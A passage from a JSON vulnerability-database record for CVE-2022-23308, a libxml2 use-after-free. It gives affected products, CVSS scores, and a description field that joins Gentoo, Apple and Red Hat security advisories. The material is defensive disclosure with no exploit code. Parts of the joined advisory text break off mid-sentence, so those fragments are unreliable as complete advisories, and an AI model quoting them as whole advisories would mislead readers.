"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.6.0"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "watchos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "8.6"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.6.6"
},
{
"_id": null,
"model": "tvos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.5"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql workbench",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.29"
},
{
"_id": null,
"model": "zfs storage appliance kit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.8"
},
{
"_id": null,
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.5"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.0"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core unified data repository",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "clustered data ontap antivirus connector",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire\\, enterprise sds \\\u0026 hci storage node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "snapmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-23308"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "166327"
},
{
"db": "PACKETSTORM",
"id": "166437"
},
{
"db": "PACKETSTORM",
"id": "166805"
},
{
"db": "PACKETSTORM",
"id": "166489"
}
],
"trust": 0.4
},
"cve": "CVE-2022-23308",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2022-23308",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-412332",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2022-23308",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-23308",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-23308",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202202-1722",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-412332",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2022-23308",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
},
{
"db": "VULMON",
"id": "CVE-2022-23308"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
},
{
"db": "NVD",
"id": "CVE-2022-23308"
},
{
"db": "NVD",
"id": "CVE-2022-23308"
}
]
},
"description": {
"_id": null,
"data": "valid.c in libxml2 before 2.9.13 has a use-after-free of ID and IDREF attributes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202210-03\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: libxml2: Multiple Vulnerabilities\n Date: October 16, 2022\n Bugs: #833809, #842261, #865727\n ID: 202210-03\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been discovered in libxml2, the worst of\nwhich could result in arbitrary code execution. \n\nBackground\n==========\n\nlibxml2 is the XML C parser and toolkit developed for the GNOME project. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/libxml2 \u003c 2.10.2 \u003e= 2.10.2\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in libxml2. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. 
\n\nResolution\n==========\n\nAll libxml2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/libxml2-2.10.2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2022-23308\n https://nvd.nist.gov/vuln/detail/CVE-2022-23308\n[ 2 ] CVE-2022-29824\n https://nvd.nist.gov/vuln/detail/CVE-2022-29824\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202210-03\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2022-05-16-1 iOS 15.5 and iPadOS 15.5\n\niOS 15.5 and iPadOS 15.5 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213258. \n\nAppleAVD\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed with improved\nmemory management. 
\nCVE-2022-26702: an anonymous researcher\n\nAppleGraphicsControl\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed with improved\ninput validation. \nCVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day\nInitiative\n\nAVEVideoEncoder\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2022-26736: an anonymous researcher\nCVE-2022-26737: an anonymous researcher\nCVE-2022-26738: an anonymous researcher\nCVE-2022-26739: an anonymous researcher\nCVE-2022-26740: an anonymous researcher\n\nDriverKit\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious application may be able to execute arbitrary code\nwith system privileges\nDescription: An out-of-bounds access issue was addressed with\nimproved bounds checking. \nCVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)\n\nGPU Drivers\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. 
\nCVE-2022-26744: an anonymous researcher\n\nImageIO\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A remote attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow issue was addressed with improved\ninput validation. \nCVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend\nMicro Zero Day Initiative\n\nIOKit\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition was addressed with improved locking. \nCVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab\n\nIOMobileFrameBuffer\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2022-26768: an anonymous researcher\n\nIOSurfaceAccelerator\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. 
\nCVE-2022-26771: an anonymous researcher\n\nKernel\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2022-26714: Peter Nguy\u1ec5n V\u0169 Ho\u00e0ng (@peternguyen14) of STAR Labs\n(@starlabs_sg)\n\nKernel\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-26757: Ned Williamson of Google Project Zero\n\nKernel\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An attacker that has already achieved kernel code execution\nmay be able to bypass kernel memory mitigations\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)\n\nKernel\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious attacker with arbitrary read and write capability\nmay be able to bypass Pointer Authentication\nDescription: A race condition was addressed with improved state\nhandling. 
\nCVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)\n\nLaunchServices\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A sandboxed process may be able to circumvent sandbox\nrestrictions\nDescription: An access issue was addressed with additional sandbox\nrestrictions on third-party applications. \nCVE-2022-26706: Arsenii Kostromin (0x3c3e)\n\nlibxml2\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A remote attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-23308\n\nNotes\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Processing a large input may lead to a denial of service\nDescription: This issue was addressed with improved checks. \nCVE-2022-22673: Abhay Kailasia (@abhay_kailasia) of Lakshmi Narain\nCollege Of Technology Bhopal\n\nSafari Private Browsing\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious website may be able to track users in Safari\nprivate browsing mode\nDescription: A logic issue was addressed with improved state\nmanagement. 
\nCVE-2022-26731: an anonymous researcher\n\nSecurity\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious app may be able to bypass signature validation\nDescription: A certificate parsing issue was addressed with improved\nchecks. \nCVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)\n\nShortcuts\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A person with physical access to an iOS device may be able to\naccess photos from the lock screen\nDescription: An authorization issue was addressed with improved state\nmanagement. \nCVE-2022-26703: Salman Syed (@slmnsd551)\n\nWebKit\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Processing maliciously crafted web content may lead to code\nexecution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nWebKit Bugzilla: 238178\nCVE-2022-26700: ryuzaki\n\nWebKit\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. 
\nWebKit Bugzilla: 236950\nCVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua\nwingtecher lab\nWebKit Bugzilla: 237475\nCVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua\nwingtecher lab\nWebKit Bugzilla: 238171\nCVE-2022-26717: Jeonghoon Shin of Theori\n\nWebKit\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nWebKit Bugzilla: 238183\nCVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab\nWebKit Bugzilla: 238699\nCVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech\n\nWebRTC\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Video self-preview in a webRTC call may be interrupted if the\nuser answers a phone call\nDescription: A logic issue in the handling of concurrent media was\naddressed with improved state handling. \nWebKit Bugzilla: 237524\nCVE-2022-22677: an anonymous researcher\n\nWi-Fi\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious application may disclose restricted memory\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2022-26745: an anonymous researcher\n\nWi-Fi\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious application may be able to elevate privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. 
\nCVE-2022-26760: 08Tc3wBB of ZecOps Mobile EDR Team\n\nWi-Fi\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A remote attacker may be able to cause a denial of service\nDescription: This issue was addressed with improved checks. \nCVE-2015-4142: Kostya Kortchinsky of Google Security Team\n\nWi-Fi\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious application may be able to execute arbitrary code\nwith system privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2022-26762: Wang Yu of Cyberserval\n\nAdditional recognition\n\nAppleMobileFileIntegrity\nWe would like to acknowledge Wojciech Regu\u0142a (@_r3ggi) of SecuRing\nfor their assistance. \n\nFaceTime\nWe would like to acknowledge Wojciech Regu\u0142a (@_r3ggi) of SecuRing\nfor their assistance. \n\nWebKit\nWe would like to acknowledge James Lee, an anonymous researcher for\ntheir assistance. \n\nWi-Fi\nWe would like to acknowledge 08Tc3wBB of ZecOps Mobile EDR Team for\ntheir assistance. \n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom https://www.apple.com/itunes/ iTunes and Software Update on the\ndevice will automatically check Apple\u0027s update server on its weekly\nschedule. When an update is detected, it is downloaded and the option\nto be installed is presented to the user when the iOS device is\ndocked. We recommend applying the update immediately if possible. 
\nSelecting Don\u0027t Install will present the option the next time you\nconnect your iOS device. The automatic update process may take up to\na week depending on the day that iTunes or the device checks for\nupdates. You may manually obtain the update via the Check for Updates\nbutton within iTunes, or the Software Update on your device. To\ncheck that the iPhone, iPod touch, or iPad has been updated: *\nNavigate to Settings * Select General * Select About. The version\nafter applying this update will be \"iOS 15.5 and iPadOS 15.5\". \nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TQACgkQeC9qKD1p\nrhh9PRAApeuHnWvZRxSW/QArItDF2fA1eXCu7n9BwPA6CoqrU7v7aR6H/NQ3wes6\nxOjoRccHRCWRJ12RubM06ggC+WA/MLb96t2Wc4IUoFDkI3G6fp/I3aHpSONv4YMt\nEoHSGMpJ3qAb6Z60mIMcshsCtyv9k4LxpjOTnHKRLp/M4JLWG4CanOGpN2u/wPPV\nTpRY4jkZlAdvQK3qrPmA8aO5sWnbh5l//kUS6IL649seZQFUeZdz7QUyodjjqr2/\nXWyqsQC4mqVphxwvWDWA5J6/Zf7C7hNdZ1BE+SPpLhjEZlU6IYBFY2PLrg9NDTv8\nYMZpftlm5HQo3qmy/HLoiF8bIqgtdz+TpgNiT+TYz9+/pvP/hyGbX6xF9esKBVjj\n+1OUnd2GaLjSdY7o9WOtZgSJQxi1/R1X1+DjY1vI+d/TQZ+Sz58Me90R99aWc+Gc\n1B8e6FhjwT48rHJiuIw75ZW1orpUX6OL5vqdge0H1aJXm7EEUhByZvm2E2DajKu2\nmp2jr01UZyb3ro0qE1zpNitNORWAdvrlriIJxFVxtxW4MygMn8ThJ/Jz2LjquHvT\nEwvCyB9jaqPKja3b/dwzf/nowjw+aocxOjelW2Q/HcyR13YF2ZHd1+hNtG/7Isrx\nWIpI9nNAQQ2LCQIgL7/xCn6Yni9t3le3+eU+cdafoqJKTpETNbk=\n=OMfW\n-----END PGP SIGNATURE-----\n\n\n. Summary:\n\nAn update for libxml2 is now available for Red Hat Enterprise Linux 8. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. 
\n\nSecurity Fix(es):\n\n* libxml2: Use-after-free of ID and IDREF attributes (CVE-2022-23308)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe desktop must be restarted (log out, then log back in) for this update\nto take effect. Package List:\n\nRed Hat Enterprise Linux AppStream (v. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Description:\n\nRed Hat Openshift GitOps is a declarative way to implement continuous\ndeployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):\n\n2062751 - CVE-2022-24730 argocd: path traversal and improper access control allows leaking out-of-bound files\n2062755 - CVE-2022-24731 argocd: path traversal allows leaking out-of-bound files\n2064682 - CVE-2022-1025 Openshift-Gitops: Improper access control allows admin privilege escalation\n\n5. Description:\n\nThis release adds the new Apache HTTP Server 2.4.37 Service Pack 11\npackages that are part of the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services Apache\nHTTP Server 2.4.37 Service Pack 10 and includes bug fixes and enhancements. \nRefer to the Release Notes for information on the most significant bug\nfixes and enhancements included in this release. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1950515 - CVE-2021-3541 libxml2: Exponential entity expansion attack bypasses all existing protection mechanisms\n1954225 - CVE-2021-3516 libxml2: Use-after-free in xmlEncodeEntitiesInternal() in entities.c\n1954232 - CVE-2021-3517 libxml2: Heap-based buffer overflow in xmlEncodeEntitiesInternal() in entities.c\n1954242 - CVE-2021-3518 libxml2: Use-after-free in xmlXIncludeDoProcess() in xinclude.c\n1956522 - CVE-2021-3537 libxml2: NULL pointer dereference when post-validating mixed content parsed in recovery mode\n2056913 - CVE-2022-23308 libxml2: Use-after-free of ID and IDREF attributes\n2062202 - CVE-2022-0778 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates\n2064321 - CVE-2022-22720 httpd: Errors encountered during the discarding of request body lead to HTTP request smuggling\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: Gatekeeper Operator v0.2 security updates and bug fixes\nAdvisory ID: RHSA-2022:1081-01\nProduct: Red Hat ACM\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:1081\nIssue date: 2022-03-28\nCVE Names: CVE-2019-5827 CVE-2019-13750 CVE-2019-13751\n CVE-2019-17594 CVE-2019-17595 CVE-2019-18218\n CVE-2019-19603 CVE-2019-20838 CVE-2020-12762\n CVE-2020-13435 CVE-2020-14155 CVE-2020-16135\n CVE-2020-24370 CVE-2021-3200 CVE-2021-3445\n CVE-2021-3521 CVE-2021-3580 CVE-2021-3712\n CVE-2021-3800 CVE-2021-3999 CVE-2021-20231\n CVE-2021-20232 CVE-2021-22876 CVE-2021-22898\n CVE-2021-22925 CVE-2021-23177 CVE-2021-28153\n CVE-2021-31566 CVE-2021-33560 CVE-2021-36084\n CVE-2021-36085 CVE-2021-36086 CVE-2021-36087\n CVE-2021-42574 CVE-2021-43565 CVE-2022-23218\n CVE-2022-23219 CVE-2022-23308 CVE-2022-23806\n CVE-2022-24407\n====================================================================\n1. 
Summary:\n\nGatekeeper Operator v0.2\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nGatekeeper Operator v0.2\n\nGatekeeper is an open source project that applies the OPA Constraint\nFramework to enforce policies on your Kubernetes clusters. \n\nThis advisory contains the container images for Gatekeeper that include\nsecurity updates, and container upgrades. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\nNote: Gatekeeper support from the Red Hat support team is limited cases\nwhere it is integrated and used with Red Hat Advanced Cluster Management\nfor Kubernetes. For support options for any other use, see the Gatekeeper\nopen source project website at:\nhttps://open-policy-agent.github.io/gatekeeper/website/docs/howto/. \n\nSecurity updates:\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n3. \n\nThe requirements to apply the upgraded images are different whether or not\nyou\nused the operator. Complete the following steps, depending on your\ninstallation:\n\n- - Upgrade gatekeeper operator:\nThe gatekeeper operator that is installed by the gatekeeper operator policy\nhas\n`installPlanApproval` set to `Automatic`. This setting means the operator\nwill\nbe upgraded automatically when there is a new version of the operator. No\nfurther action is required for upgrade. 
If you changed the setting for\n`installPlanApproval` to `manual`, then you must view each cluster to\nmanually\napprove the upgrade to the operator. \n\n- - Upgrade gatekeeper without the operator:\nThe gatekeeper version is specified as part of the Gatekeeper CR in the\ngatekeeper operator policy. To upgrade the gatekeeper version:\na) Determine the latest version of gatekeeper by visiting:\nhttps://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. \nb) Click the tag dropdown, and find the latest static tag. An example tag\nis\n\u0027v3.3.0-1\u0027. \nc) Edit the gatekeeper operator policy and update the image tag to use the\nlatest static tag. For example, you might change this line to image:\n\u0027registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1\u0027. \n\nRefer to https://open-policy-agent.github.io/gatekeeper/website/docs/howto/\nfor additional information. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n\n5. 
References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-5827\nhttps://access.redhat.com/security/cve/CVE-2019-13750\nhttps://access.redhat.com/security/cve/CVE-2019-13751\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-19603\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-12762\nhttps://access.redhat.com/security/cve/CVE-2020-13435\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-16135\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttps://access.redhat.com/security/cve/CVE-2021-3200\nhttps://access.redhat.com/security/cve/CVE-2021-3445\nhttps://access.redhat.com/security/cve/CVE-2021-3521\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3712\nhttps://access.redhat.com/security/cve/CVE-2021-3800\nhttps://access.redhat.com/security/cve/CVE-2021-3999\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-22876\nhttps://access.redhat.com/security/cve/CVE-2021-22898\nhttps://access.redhat.com/security/cve/CVE-2021-22925\nhttps://access.redhat.com/security/cve/CVE-2021-23177\nhttps://access.redhat.com/security/cve/CVE-2021-28153\nhttps://access.redhat.com/security/cve/CVE-2021-31566\nhttps://access.redhat.com/security/cve/CVE-2021-33560\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-42574\nhttps://access.redhat.com/security/cve/CVE-2021-43565\nhttps://access.redhat.com/security/cve/CVE-2022-23218\n
